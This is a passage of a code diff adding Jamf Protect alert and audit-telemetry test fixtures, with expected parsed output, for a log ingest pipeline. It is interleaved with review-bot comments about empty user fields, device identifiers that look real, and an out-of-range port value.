Assist/Uninstall\"],\"name\":\"bash\",\"path\":\"/bin/bash\",\"pgid\":3096,\"ppid\":3063,\"rgid\":20,\"ruid\":501,\"uuid\":\"6600050c-406a-4cd6-8c31-1eefe04fea65\",\"flags\":[],\"processType\":\"GPSystemObject\",\"signingInfo\":{\"appid\":\"com.apple.bash\",\"cdhash\":\"w8D5iqHkJJxjGQGuFQLtfzG2Wes=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"inheritedFlags\":[],\"responsiblePID\":765,\"startTimestamp\":1698841233,\"originalParentPID\":3063,\"processIdentifier\":6650},{\"gid\":20,\"pid\":3063,\"uid\":501,\"args\":[\"-zsh\"],\"name\":\"zsh\",\"path\":\"/bin/zsh\",\"pgid\":3063,\"ppid\":3062,\"rgid\":20,\"ruid\":501,\"uuid\":\"f596588c-0db5-4fdb-bd64-95584398c596\",\"flags\":[],\"processType\":\"GPSystemObject\",\"signingInfo\":{\"appid\":\"com.apple.zsh\",\"cdhash\":\"f8w59TUpUrUhesGyuRBvXldP3Q0=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"inheritedFlags\":[],\"responsiblePID\":765,\"startTimestamp\":1698841233,\"originalParentPID\":3062,\"processIdentifier\":6608},{\"gid\":20,\"pid\":3062,\"uid\":0,\"args\":[\"login\",\"-pf\",\"local-admin\"],\"name\":\"login\",\"path\":\"/usr/bin/login\",\"pgid\":3062,\"ppid\":765,\"rgid\":20,\"ruid\":501,\"uuid\":\"bfd4dcd0-5054-4cab-9b8f-1e650d977771\",\"flags\":[],\"processType\":\"GPSystemObject\",\"signingInfo\":{\"appid\":\"com.apple.login\",\"cdhash\":\"MnR8eKbXO4v5eUokTXLWEDUfCVY=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[\"com.apple.private.endpoint-security.submit.login\",\"com.apple.private.security.clear-library-validation\"],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"inheritedFlags\":[],\"responsiblePID\":765,\"startTimestamp\":1698841233,\"originalParentPID\":765,\"processIdentifier\":6606},{\"gid\":20,\"pid\":765,\"uid\":501,\"args\":[\"/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal\"],\"name\":\"Terminal\",\"path\":\"/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal\",\"pgid\":765,\"ppid\":1,\"rgid\":20,\"ruid\":501,\"uuid\":\"7fb1cc18-b1a9-467a-880a-3a6e86960880\",\"flags\":[],\"appPath\":\"/System/Applications/Utilities/Terminal.app\",\"processType\":\"GPSystemObject\",\"signingInfo\":{\"appid\":\"com.apple.Terminal\",\"cdhash\":\"wW5ML2vzWxs1MRJgpzVfrYJJ/GU=\",\"status\":0,\"teamid\":\"\",\"signerType\":0,\"authorities\":[\"Software Signing\",\"Apple Code Signing Certification Authority\",\"Apple Root CA\"],\"entitlements\":[],\"statusMessage\":\"No error.\",\"informationStage\":\"extended\"},\"inheritedFlags\":[],\"responsiblePID\":765,\"startTimestamp\":1698840671,\"originalParentPID\":1,\"processIdentifier\":1812}]},\"eventType\":\"GPProcessEvent\"}}",
+ "observer": {
+ "product": "Jamf Protect",
+ "vendor": "Jamf"
+ },
+ "process": {
+ "args": [
+ "/usr/libexec/security_authtrampoline",
+ "/Library/Application Support/JAMF/Remote Assist/Wipe",
+ "auth 16"
+ ],
+ "code_signature": {
+ "signing_id": "com.apple.security_authtrampoline",
+ "status": "No error.",
+ "team_id": ""
+ },
+ "entity_id": "c821d617-2ce5-4475-aae6-c428a1ad9e8c",
+ "executable": "/usr/libexec/security_authtrampoline",
+ "group_leader": {
+ "executable": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
+ "name": "Terminal",
+ "pid": 765,
+ "real_group": {
+ "id": "20"
+ },
+ "real_user": {
+ "id": "501"
+ },
+ "start": "2023-11-01T12:11:11Z",
+ "user": {
+ "id": "501"
+ }
+ },
+ "hash": {
+ "sha1": "82e899cb1c8a42b74653b05ca526d5feae92b9f6",
+ "sha256": "7528368ce03bd25fb22520923f366e364ea40ae90b22dac79fba90f2152c3d32"
+ },
+ "name": "security_authtrampoline",
+ "parent": {
+ "code_signature": {
+ "signing_id": "com.jamf.remoteassist.launcher",
+ "status": "No error.",
+ "team_id": "483DWKW443"
+ },
+ "executable": "/Library/Application Support/JAMF/Remote Assist/jamfRemoteAssistLauncher",
+ "name": "jamfRemoteAssistLauncher",
+ "pid": 3099,
+ "real_group": {
+ "id": "0"
+ },
+ "real_user": {
+ "id": "0"
+ },
+ "start": "2023-11-01T12:20:36Z",
+ "user": {
+ "id": "0"
+ }
+ },
+ "pid": 3136,
+ "real_group": {
+ "id": "0"
+ },
+ "real_user": {
+ "id": "0"
+ },
+ "start": "2023-11-01T12:20:38Z",
+ "tty": "/dev/ttys016",
+ "user": {
+ "id": "0"
+ }
+ },
+ "related": {
+ "hash": [
+ "82e899cb1c8a42b74653b05ca526d5feae92b9f6",
+ "7528368ce03bd25fb22520923f366e364ea40ae90b22dac79fba90f2152c3d32"
+ ],
+ "user": [
+ "root",
+ "local-admin",
+ ""
+ ]
+ },
+ "tags": [
+ "DefenseEvasion",
+ "T1548.004",
+ "PrivilegeEscalation",
+ "MITREattack",
+ "AbuseElevationControlMechanism"
+ ],
+ "threat": {
+ "framework": "MITRE ATT\u0026CK",
+ "software": {
+ "platforms": "macOS"
+ }
+ }
+}
\ No newline at end of file
diff --git a/packages/jamf_protect/data_stream/telemetry/_dev/test/pipeline/test-jamf-protect-telemetry-sample-logs.log b/packages/jamf_protect/data_stream/telemetry/_dev/test/pipeline/test-jamf-protect-telemetry-sample-logs.log
new file mode 100644
index 00000000000..5d88378a17a
--- /dev/null
+++ b/packages/jamf_protect/data_stream/telemetry/_dev/test/pipeline/test-jamf-protect-telemetry-sample-logs.log
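Review bot: `related.user` in this sample ends with an empty string (`"root", "local-admin", ""`), which indicates the ingest pipeline (not in this chunk) appends a user field that is unset or empty for this event; an empty `related.user` entry is noise for correlation queries and should be prevented by guarding the `append` processor with an `if` that checks the source value is non-null and non-empty. Since this file is typically regenerated from a system test rather than edited by hand, the fix belongs in the pipeline and the sample should be regenerated afterwards. Note also that the event carries `user.name` and `process.user.id` for root while `process.user.name` is absent, so the empty entry is most likely the process user name being appended unconditionally; worth confirming against the pipeline.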
@@ -0,0 +1,7 @@
+{"arguments":{"child_PID":70851},"attributes":{"device":0,"file_access_mode":33261,"file_system_id":16777229,"node_id":632456,"owner_group_id":0,"owner_group_name":"wheel","owner_user_id":0,"owner_user_name":"root"},"exec_args":{"args":{"1":"/usr/bin/profiles","2":"status","3":"-type","4":"enrollment"},"args_compiled":"/usr/bin/profiles,status,-type,enrollment"},"exec_chain":{"thread_uuid":"EB3B7725-EB0E-4710-BCA6-F390DD9AE309"},"exec_chain_parent":{"uuid":"87F2E500-EDF1-4F12-A489-C5E05B0F523E"},"exec_env":{"env":{"PATH":"/usr/bin:/bin:/usr/sbin:/sbin","PWD":"/"},"env_compiled":"PWD=/,PATH=/usr/bin:/bin:/usr/sbin:/sbin"},"header":{"event_id":43190,"event_modifier":0,"event_name":"AUE_POSIX_SPAWN","time_milliseconds_offset":442,"time_seconds_epoch":1707235294,"version":11},"host_info":{"host_name":"Mac mini","host_uuid":"AE2FA359-6AB0-5F54-9E4A-39EDCF015C91","osversion":"Version 14.2.1 (Build 23C71)","serial_number":"H2WGF2U9Q6NV"},"identity":{"cd_hash":"a2c787fe5e26ead7c68909e45a75edced4147c68","signer_id":"com.microsoft.EdgeUpdater","signer_id_truncated":false,"signer_type":0,"team_id":"UBF8T346G9","team_id_truncated":false},"key":"FF48B7F5-C8CD-42E6-8782-5A92D1BD87CE","path":["/usr/bin/profiles","/usr/bin/profiles"],"return":{"description":"success","error":0,"return_value":0},"subject":{"audit_id":4294967295,"audit_user_name":"","effective_group_id":0,"effective_group_name":"wheel","effective_user_id":0,"effective_user_name":"root","group_id":0,"group_name":"wheel","process_hash":"9cfc802baf45b74693d146686ebe9ec59ac6367f","process_id":70848,"process_name":"/Library/Application Support/Microsoft/EdgeUpdater/118.0.2088.86/EdgeUpdater.app/Contents/MacOS/EdgeUpdater","responsible_process_id":70837,"responsible_process_name":"/Library/Application Support/Microsoft/EdgeUpdater/118.0.2088.86/EdgeUpdater.app/Contents/MacOS/EdgeUpdater","session_id":100016,"terminal_id":{"ip_address":"0.0.0.0","port":0,"type":4},"user_id":0,"user_name":"root"}}
+{"arguments":{"child_PID":70848},"attributes":{"device":0,"file_access_mode":33261,"file_system_id":16777229,"node_id":63665431,"owner_group_id":80,"owner_group_name":"admin","owner_user_id":0,"owner_user_name":"root"},"exec_args":{"args":{"1":"EdgeUpdater","2":"--server","3":"--service=update","4":"--enable-logging","5":"--vmodule=*/components/update_client/*=2,*/chrome/updater/*=2","6":"--system"},"args_compiled":"EdgeUpdater,--server,--service=update,--enable-logging,--vmodule=*/components/update_client/*=2,*/chrome/updater/*=2,--system"},"exec_chain":{"thread_uuid":"19B9384C-9C21-4C6C-9954-355AD780910C"},"exec_chain_child":{"parent_path":"/Library/Application Support/Microsoft/EdgeUpdater/118.0.2088.86/EdgeUpdater.app/Contents/MacOS/EdgeUpdater","parent_pid":70844,"parent_uuid":"93082F2D-206D-4FA8-925B-6548C6B247C1"},"exec_chain_parent":{"uuid":"EB3B7725-EB0E-4710-BCA6-F390DD9AE309"},"exec_env":{"env":{"PATH":"/usr/bin:/bin:/usr/sbin:/sbin","PWD":"/"},"env_compiled":"PWD=/,PATH=/usr/bin:/bin:/usr/sbin:/sbin"},"header":{"event_id":43190,"event_modifier":0,"event_name":"AUE_POSIX_SPAWN","time_milliseconds_offset":427,"time_seconds_epoch":1707235294,"version":11},"host_info":{"host_name":"Mac mini","host_uuid":"AE2FA359-6AB0-5F54-9E4A-39EDCF015C91","osversion":"Version 14.2.1 (Build 23C71)","serial_number":"H2WGF2U9Q6NV"},"identity":{"cd_hash":"abbed514a26c2f8c80e08a6d81d72ea8029739fe","signer_id":"com.microsoft.EdgeUpdater","signer_id_truncated":false,"signer_type":0,"team_id":"UBF8T346G9","team_id_truncated":false},"key":"0BE676E2-FFDB-4A75-BBEA-F783E0E573E8","path":["/Library/Application Support/Microsoft/EdgeUpdater/118.0.2088.86/EdgeUpdater.app/Contents/MacOS/EdgeUpdater","/Library/Application Support/Microsoft/EdgeUpdater/118.0.2088.86/EdgeUpdater.app/Contents/MacOS/EdgeUpdater"],"return":{"description":"success","error":0,"return_value":0},"subject":{"audit_id":4294967295,"audit_user_name":"","effective_group_id":0,"effective_group_name":"wheel","effective_user_id":0,"effective_user_name":"root","group_id":0,"group_name":"wheel","process_hash":"0237c54b185a3b516bb2918132d9d05de10eaa7c","process_id":70847,"process_name":"/Library/Application Support/Microsoft/EdgeUpdater/118.0.2088.86/EdgeUpdater.app/Contents/Helpers/launcher","responsible_process_id":70837,"responsible_process_name":"/Library/Application Support/Microsoft/EdgeUpdater/118.0.2088.86/EdgeUpdater.app/Contents/MacOS/EdgeUpdater","session_id":100016,"terminal_id":{"ip_address":"0.0.0.0","port":0,"type":4},"user_id":0,"user_name":"root"}}
+{"arguments":{"child_PID":70843},"attributes":{"device":0,"file_access_mode":35309,"file_system_id":16777229,"node_id":63665429,"owner_group_id":80,"owner_group_name":"admin","owner_user_id":0,"owner_user_name":"root"},"exec_args":{"args":{"1":"/Library/Application Support/Microsoft/EdgeUpdater/118.0.2088.86/EdgeUpdater.app/Contents/Helpers/launcher","2":"--internal"},"args_compiled":"/Library/Application Support/Microsoft/EdgeUpdater/118.0.2088.86/EdgeUpdater.app/Contents/Helpers/launcher,--internal"},"exec_chain":{"thread_uuid":"3DB0D0B9-31ED-4E4D-9366-C07B622AEBEB"},"exec_chain_parent":{"uuid":"93E2DBD5-9546-430E-ADA0-CA460E0A80C9"},"exec_env":{"env":{"PATH":"/usr/bin:/bin:/usr/sbin:/sbin","XPC_FLAGS":"0x0","XPC_SERVICE_NAME":"com.microsoft.EdgeUpdater.wake.system"},"env_compiled":"XPC_SERVICE_NAME=com.microsoft.EdgeUpdater.wake.system,PATH=/usr/bin:/bin:/usr/sbin:/sbin,XPC_FLAGS=0x0"},"header":{"event_id":43190,"event_modifier":0,"event_name":"AUE_POSIX_SPAWN","time_milliseconds_offset":316,"time_seconds_epoch":1707235293,"version":11},"host_info":{"host_name":"Mac mini","host_uuid":"AE2FA359-6AB0-5F54-9E4A-39EDCF015C91","osversion":"Version 14.2.1 (Build 23C71)","serial_number":"H2WGF2U9Q6NV"},"identity":{"cd_hash":"a2c787fe5e26ead7c68909e45a75edced4147c68","signer_id":"com.microsoft.EdgeUpdater","signer_id_truncated":false,"signer_type":0,"team_id":"UBF8T346G9","team_id_truncated":false},"key":"18922E6D-7EDA-460B-A5DC-D9B92BA8085E","path":["/Library/Application Support/Microsoft/EdgeUpdater/118.0.2088.86/EdgeUpdater.app/Contents/Helpers/launcher","/Library/Application Support/Microsoft/EdgeUpdater/118.0.2088.86/EdgeUpdater.app/Contents/Helpers/launcher"],"return":{"description":"success","error":0,"return_value":0},"subject":{"audit_id":4294967295,"audit_user_name":"","effective_group_id":0,"effective_group_name":"wheel","effective_user_id":0,"effective_user_name":"root","group_id":0,"group_name":"wheel","process_hash":"9cfc802baf45b74693d146686ebe9ec59ac6367f","process_id":70840,"process_name":"/Library/Application Support/Microsoft/EdgeUpdater/118.0.2088.86/EdgeUpdater.app/Contents/MacOS/EdgeUpdater","responsible_process_id":70837,"responsible_process_name":"/usr/libexec/xpcproxy","session_id":100016,"terminal_id":{"ip_address":"0.0.0.0","port":0,"type":4},"user_id":0,"user_name":"root"}}
+{"arguments":{"fd":4},"exec_chain":{"thread_uuid":"2AE4FC6A-7F96-4B7A-B045-D6B3FDED39FE"},"header":{"event_id":32,"event_modifier":0,"event_name":"AUE_CONNECT","time_milliseconds_offset":755,"time_seconds_epoch":1707235837,"version":11},"host_info":{"host_name":"Goomba","host_uuid":"667A9510-585B-526B-9B61-47BD834C8ECE","osversion":"Version 14.2.1 (Build 23C71)","serial_number":"H2WHM0PAQ6NV"},"identity":{"cd_hash":"67ed44d08677ea5d2eb9c7db71be23b127bd3e99","signer_id":"com.apple.nfcd","signer_id_truncated":false,"signer_type":1,"team_id":"","team_id_truncated":false},"key":"B9C086AE-78C8-4F01-A77D-4AE422F9366D","return":{"description":"success","error":0,"return_value":0},"subject":{"audit_id":4294967295,"audit_user_name":"","effective_group_id":260,"effective_group_name":"_applepay","effective_user_id":260,"effective_user_name":"_applepay","group_id":260,"group_name":"_applepay","process_hash":"137517d0be201cfbf8e9dd97765b3f38f0ae4de5","process_id":1002,"process_name":"/usr/libexec/nfcd","responsible_process_id":1002,"responsible_process_name":"/usr/libexec/nfcd","session_id":100015,"terminal_id":{"ip_address":"0.0.0.0","port":0,"type":4},"user_id":260,"user_name":"_applepay"}}
+{"arguments":{"fd":5},"exec_chain":{"thread_uuid":"39896B66-2B2C-4D33-9A75-58154E8EB508"},"header":{"event_id":32,"event_modifier":0,"event_name":"AUE_CONNECT","time_milliseconds_offset":473,"time_seconds_epoch":1707235836,"version":11},"host_info":{"host_name":"Mac mini","host_uuid":"AE2FA359-6AB0-5F54-9E4A-39EDCF015C91","osversion":"Version 14.2.1 (Build 23C71)","serial_number":"H2WGF2U9Q6NV"},"identity":{"cd_hash":"beef65d6aeba15d0dd7ef1a076d4bcbd386c1652","signer_id":"com.apple.mdmclient","signer_id_truncated":false,"signer_type":1,"team_id":"","team_id_truncated":false},"key":"F3DBBFB9-2FF7-4A14-A57F-A18F9D9E6FD1","return":{"description":"success","error":0,"return_value":0},"subject":{"audit_id":4294967295,"audit_user_name":"","effective_group_id":0,"effective_group_name":"wheel","effective_user_id":0,"effective_user_name":"root","group_id":0,"group_name":"wheel","process_hash":"b71712207edc22d9b5753aac0d927a7d9ded719d","process_id":70971,"process_name":"/usr/libexec/mdmclient","responsible_process_id":70971,"responsible_process_name":"/usr/libexec/mdmclient","session_id":100016,"terminal_id":{"ip_address":"0.0.0.0","port":0,"type":4},"user_id":0,"user_name":"root"}}
+{"exec_chain":{"thread_uuid":"340F694C-4A80-4008-8B99-AEF108250576"},"header":{"event_id":45025,"event_modifier":0,"event_name":"AUE_ssauthorize","time_milliseconds_offset":477,"time_seconds_epoch":1707234868,"version":11},"host_info":{"host_name":"Mac mini","host_uuid":"AE2FA359-6AB0-5F54-9E4A-39EDCF015C91","osversion":"Version 14.2.1 (Build 23C71)","serial_number":"H2WGF2U9Q6NV"},"identity":{"cd_hash":"fc3dce73c15ec7a1cba507101fec3a47e268fa27","signer_id":"com.apple.authd","signer_id_truncated":false,"signer_type":1,"team_id":"","team_id_truncated":false},"key":"DF67FD17-2BE4-4811-933F-78CBA33BAD93","rateLimitingSeconds":1800,"return":{"description":"success","error":0,"return_value":0},"subject":{"audit_id":4294967295,"audit_user_name":"","effective_group_id":0,"effective_group_name":"wheel","effective_user_id":0,"effective_user_name":"root","group_id":0,"group_name":"wheel","process_hash":"b71712207edc22d9b5753aac0d927a7d9ded719d","process_id":69544,"process_name":"/usr/libexec/mdmclient","responsible_process_id":69544,"responsible_process_name":"/usr/libexec/mdmclient","session_id":100016,"terminal_id":{"ip_address":"0.0.0.0","port":959597,"type":4},"user_id":0,"user_name":"root"},"texts":["com.apple.ServiceManagement.daemons.modify","client /usr/libexec/mdmclient","creator /usr/libexec/mdmclient"]}
+{"arguments":{"am_failure":0,"am_success":0,"sflags":0},"exec_chain":{"thread_uuid":"8FEACD31-E575-45F4-9A31-F81A6EDF68A8"},"header":{"event_id":44903,"event_modifier":0,"event_name":"AUE_SESSION_END","time_milliseconds_offset":272,"time_seconds_epoch":1707235736,"version":11},"host_info":{"host_name":"Goomba","host_uuid":"667A9510-585B-526B-9B61-47BD834C8ECE","osversion":"Version 14.2.1 (Build 23C71)","serial_number":"H2WHM0PAQ6NV"},"key":"79C80894-E1A4-4BC3-A974-B6EC69CB172D","return":{"description":"success","error":0,"return_value":0},"subject":{"audit_id":4294967295,"audit_user_name":"","effective_group_id":0,"effective_group_name":"wheel","effective_user_id":0,"effective_user_name":"root","group_id":0,"group_name":"wheel","process_hash":"","process_id":0,"process_name":"","responsible_process_id":0,"responsible_process_name":"","session_id":101188,"terminal_id":{"ip_address":"0.0.0.0","port":0,"type":4},"user_id":0,"user_name":"root"}}
\ No newline at end of file
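Review bot: The fixture embeds what look like real device identifiers — the host serial numbers `H2WGF2U9Q6NV` and `H2WHM0PAQ6NV`, the `host_uuid` values and the host names — alongside real code-signing `cd_hash` values; if these were captured from a live machine rather than synthesised, they should be replaced with clearly fake values before merging, since the file ships in a public package repository. The `AUE_ssauthorize` event also carries `terminal_id.port: 959597`, which is outside the valid 0–65535 port range; that is a useful edge case to keep, but make sure the pipeline's port conversion tolerates it (or routes it to `error.message`) rather than failing the document, and that the expected output file reflects the chosen behaviour.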
diff --git a/packages/jamf_protect/data_stream/telemetry/_dev/test/pipeline/test-jamf-protect-telemetry-sample-logs.log-expected.json b/packages/jamf_protect/data_stream/telemetry/_dev/test/pipeline/test-jamf-protect-telemetry-sample-logs.log-expected.json
new file mode 100644
index 00000000000..2b186323874
--- /dev/null
+++ b/packages/jamf_protect/data_stream/telemetry/_dev/test/pipeline/test-jamf-protect-telemetry-sample-logs.log-expected.json
@@ -0,0 +1,885 @@ +{ + "expected": [ + { + "@timestamp": "2024-02-06T16:01:34.442Z", + "ecs": { + "version": "8.11.0" + }, + "error": { + "code": "0" + }, + "event": { + "action": "aue_posix_spawn", + "category": [ + "authentication" + ], + "code": "43190", + "kind": "event", + "outcome": "success", + "type": [ + "info" + ] + }, + "host": { + "hostname": "Mac mini", + "id": "H2WGF2U9Q6NV", + "ip": [ + "0.0.0.0" + ], + "os": { + "version": "Version 14.2.1 (Build 23C71)" + } + }, + "jamf_protect": { + "telemetry": { + "arguments": { + "child": { + "pid": 70851 + } + }, + "dataset": "audit", + "exec_args": { + "args_compiled": "/usr/bin/profiles,status,-type,enrollment" + }, + "exec_chain_parent": { + "uuid": "87F2E500-EDF1-4F12-A489-C5E05B0F523E" + }, + "exec_env": { + "env": { + "compiled": "PWD=/,PATH=/usr/bin:/bin:/usr/sbin:/sbin" + } + }, + "header": { + "event_modifier": "0", + "version": "11" + }, + "host_info": { + "host": { + "uuid": "AE2FA359-6AB0-5F54-9E4A-39EDCF015C91" + } + }, + "identity": { + "cd_hash": "a2c787fe5e26ead7c68909e45a75edced4147c68", + "signer": { + "id_truncated": "false", + "type": "0" + } + }, + "path": [ + "/usr/bin/profiles", + "/usr/bin/profiles" + ], + "return": { + "description": "success" + }, + "subject": { + "effective": { + "group": { + "id": "0", + "name": "wheel" + } + }, + "process": { + "name": "/Library/Application Support/Microsoft/EdgeUpdater/118.0.2088.86/EdgeUpdater.app/Contents/MacOS/EdgeUpdater", + "pid": 70848 + }, + "session": { + "id": "100016" + }, + "terminal_id": { + "port": 0, + "type": "4" + } + } + } + }, + "process": { + "args": [ + "/usr/bin/profiles", + "status", + "-type", + "enrollment" + ], + "code_signature": { + "signing_id": "com.microsoft.EdgeUpdater", + "team_id": "UBF8T346G9" + }, + "exit_code": 0, + "hash": { + "sha1": "9cfc802baf45b74693d146686ebe9ec59ac6367f" + }, + "real_group": { + "id": "0", + "name": "wheel" + }, + "real_user": { + "id": "4294967295" + }, + "user": { + "id": "0", + "name": 
"root" + } + }, + "related": { + "hash": [ + "9cfc802baf45b74693d146686ebe9ec59ac6367f" + ], + "hosts": [ + "Mac mini" + ], + "ip": [ + "0.0.0.0" + ], + "user": [ + "root" + ] + }, + "user": { + "id": "0", + "name": [ + "root" + ] + } + }, + { + "@timestamp": "2024-02-06T16:01:34.427Z", + "ecs": { + "version": "8.11.0" + }, + "error": { + "code": "0" + }, + "event": { + "action": "aue_posix_spawn", + "category": [ + "authentication" + ], + "code": "43190", + "kind": "event", + "outcome": "success", + "type": [ + "info" + ] + }, + "host": { + "hostname": "Mac mini", + "id": "H2WGF2U9Q6NV", + "ip": [ + "0.0.0.0" + ], + "os": { + "version": "Version 14.2.1 (Build 23C71)" + } + }, + "jamf_protect": { + "telemetry": { + "arguments": { + "child": { + "pid": 70848 + } + }, + "dataset": "audit", + "exec_args": { + "args_compiled": "EdgeUpdater,--server,--service=update,--enable-logging,--vmodule=*/components/update_client/*=2,*/chrome/updater/*=2,--system" + }, + "exec_chain_parent": { + "uuid": "EB3B7725-EB0E-4710-BCA6-F390DD9AE309" + }, + "exec_env": { + "env": { + "compiled": "PWD=/,PATH=/usr/bin:/bin:/usr/sbin:/sbin" + } + }, + "header": { + "event_modifier": "0", + "version": "11" + }, + "host_info": { + "host": { + "uuid": "AE2FA359-6AB0-5F54-9E4A-39EDCF015C91" + } + }, + "identity": { + "cd_hash": "abbed514a26c2f8c80e08a6d81d72ea8029739fe", + "signer": { + "id_truncated": "false", + "type": "0" + } + }, + "path": [ + "/Library/Application Support/Microsoft/EdgeUpdater/118.0.2088.86/EdgeUpdater.app/Contents/MacOS/EdgeUpdater", + "/Library/Application Support/Microsoft/EdgeUpdater/118.0.2088.86/EdgeUpdater.app/Contents/MacOS/EdgeUpdater" + ], + "return": { + "description": "success" + }, + "subject": { + "effective": { + "group": { + "id": "0", + "name": "wheel" + } + }, + "process": { + "name": "/Library/Application Support/Microsoft/EdgeUpdater/118.0.2088.86/EdgeUpdater.app/Contents/Helpers/launcher", + "pid": 70847 + }, + "session": { + "id": "100016" + }, + 
"terminal_id": { + "port": 0, + "type": "4" + } + } + } + }, + "process": { + "args": [ + "EdgeUpdater", + "--server", + "--service=update", + "--enable-logging", + "--vmodule=*/components/update_client/*=2,*/chrome/updater/*=2", + "--system" + ], + "code_signature": { + "signing_id": "com.microsoft.EdgeUpdater", + "team_id": "UBF8T346G9" + }, + "exit_code": 0, + "hash": { + "sha1": "0237c54b185a3b516bb2918132d9d05de10eaa7c" + }, + "real_group": { + "id": "0", + "name": "wheel" + }, + "real_user": { + "id": "4294967295" + }, + "user": { + "id": "0", + "name": "root" + } + }, + "related": { + "hash": [ + "0237c54b185a3b516bb2918132d9d05de10eaa7c" + ], + "hosts": [ + "Mac mini" + ], + "ip": [ + "0.0.0.0" + ], + "user": [ + "root" + ] + }, + "user": { + "id": "0", + "name": [ + "root" + ] + } + }, + { + "@timestamp": "2024-02-06T16:01:33.316Z", + "ecs": { + "version": "8.11.0" + }, + "error": { + "code": "0" + }, + "event": { + "action": "aue_posix_spawn", + "category": [ + "authentication" + ], + "code": "43190", + "kind": "event", + "outcome": "success", + "type": [ + "info" + ] + }, + "host": { + "hostname": "Mac mini", + "id": "H2WGF2U9Q6NV", + "ip": [ + "0.0.0.0" + ], + "os": { + "version": "Version 14.2.1 (Build 23C71)" + } + }, + "jamf_protect": { + "telemetry": { + "arguments": { + "child": { + "pid": 70843 + } + }, + "dataset": "audit", + "exec_args": { + "args_compiled": "/Library/Application Support/Microsoft/EdgeUpdater/118.0.2088.86/EdgeUpdater.app/Contents/Helpers/launcher,--internal" + }, + "exec_chain_parent": { + "uuid": "93E2DBD5-9546-430E-ADA0-CA460E0A80C9" + }, + "exec_env": { + "env": { + "compiled": "XPC_SERVICE_NAME=com.microsoft.EdgeUpdater.wake.system,PATH=/usr/bin:/bin:/usr/sbin:/sbin,XPC_FLAGS=0x0", + "xpc": { + "flags": "0x0" + } + } + }, + "header": { + "event_modifier": "0", + "version": "11" + }, + "host_info": { + "host": { + "uuid": "AE2FA359-6AB0-5F54-9E4A-39EDCF015C91" + } + }, + "identity": { + "cd_hash": 
"a2c787fe5e26ead7c68909e45a75edced4147c68", + "signer": { + "id_truncated": "false", + "type": "0" + } + }, + "path": [ + "/Library/Application Support/Microsoft/EdgeUpdater/118.0.2088.86/EdgeUpdater.app/Contents/Helpers/launcher", + "/Library/Application Support/Microsoft/EdgeUpdater/118.0.2088.86/EdgeUpdater.app/Contents/Helpers/launcher" + ], + "return": { + "description": "success" + }, + "subject": { + "effective": { + "group": { + "id": "0", + "name": "wheel" + } + }, + "process": { + "name": "/Library/Application Support/Microsoft/EdgeUpdater/118.0.2088.86/EdgeUpdater.app/Contents/MacOS/EdgeUpdater", + "pid": 70840 + }, + "session": { + "id": "100016" + }, + "terminal_id": { + "port": 0, + "type": "4" + } + } + } + }, + "process": { + "args": [ + "/Library/Application Support/Microsoft/EdgeUpdater/118.0.2088.86/EdgeUpdater.app/Contents/Helpers/launcher", + "--internal" + ], + "code_signature": { + "signing_id": "com.microsoft.EdgeUpdater", + "team_id": "UBF8T346G9" + }, + "exit_code": 0, + "hash": { + "sha1": "9cfc802baf45b74693d146686ebe9ec59ac6367f" + }, + "real_group": { + "id": "0", + "name": "wheel" + }, + "real_user": { + "id": "4294967295" + }, + "user": { + "id": "0", + "name": "root" + } + }, + "related": { + "hash": [ + "9cfc802baf45b74693d146686ebe9ec59ac6367f" + ], + "hosts": [ + "Mac mini" + ], + "ip": [ + "0.0.0.0" + ], + "user": [ + "root" + ] + }, + "user": { + "id": "0", + "name": [ + "root" + ] + } + }, + { + "@timestamp": "2024-02-06T16:10:37.755Z", + "ecs": { + "version": "8.11.0" + }, + "error": { + "code": "0" + }, + "event": { + "action": "aue_connect", + "category": [ + "authentication" + ], + "code": "32", + "kind": "event", + "outcome": "success", + "type": [ + "info" + ] + }, + "host": { + "hostname": "Goomba", + "id": "H2WHM0PAQ6NV", + "ip": [ + "0.0.0.0" + ], + "os": { + "version": "Version 14.2.1 (Build 23C71)" + } + }, + "jamf_protect": { + "telemetry": { + "arguments": { + "fd": "4" + }, + "dataset": "audit", + "header": { + 
"event_modifier": "0", + "version": "11" + }, + "host_info": { + "host": { + "uuid": "667A9510-585B-526B-9B61-47BD834C8ECE" + } + }, + "identity": { + "cd_hash": "67ed44d08677ea5d2eb9c7db71be23b127bd3e99", + "signer": { + "id_truncated": "false", + "type": "1" + } + }, + "return": { + "description": "success" + }, + "subject": { + "effective": { + "group": { + "id": "260", + "name": "_applepay" + } + }, + "process": { + "name": "/usr/libexec/nfcd", + "pid": 1002 + }, + "session": { + "id": "100015" + }, + "terminal_id": { + "port": 0, + "type": "4" + } + } + } + }, + "process": { + "code_signature": { + "signing_id": "com.apple.nfcd" + }, + "exit_code": 0, + "hash": { + "sha1": "137517d0be201cfbf8e9dd97765b3f38f0ae4de5" + }, + "real_group": { + "id": "260", + "name": "_applepay" + }, + "real_user": { + "id": "4294967295" + }, + "user": { + "id": "260", + "name": "_applepay" + } + }, + "related": { + "hash": [ + "137517d0be201cfbf8e9dd97765b3f38f0ae4de5" + ], + "hosts": [ + "Goomba" + ], + "ip": [ + "0.0.0.0" + ], + "user": [ + "_applepay" + ] + }, + "user": { + "id": "260", + "name": [ + "_applepay" + ] + } + }, + { + "@timestamp": "2024-02-06T16:10:36.473Z", + "ecs": { + "version": "8.11.0" + }, + "error": { + "code": "0" + }, + "event": { + "action": "aue_connect", + "category": [ + "authentication" + ], + "code": "32", + "kind": "event", + "outcome": "success", + "type": [ + "info" + ] + }, + "host": { + "hostname": "Mac mini", + "id": "H2WGF2U9Q6NV", + "ip": [ + "0.0.0.0" + ], + "os": { + "version": "Version 14.2.1 (Build 23C71)" + } + }, + "jamf_protect": { + "telemetry": { + "arguments": { + "fd": "5" + }, + "dataset": "audit", + "header": { + "event_modifier": "0", + "version": "11" + }, + 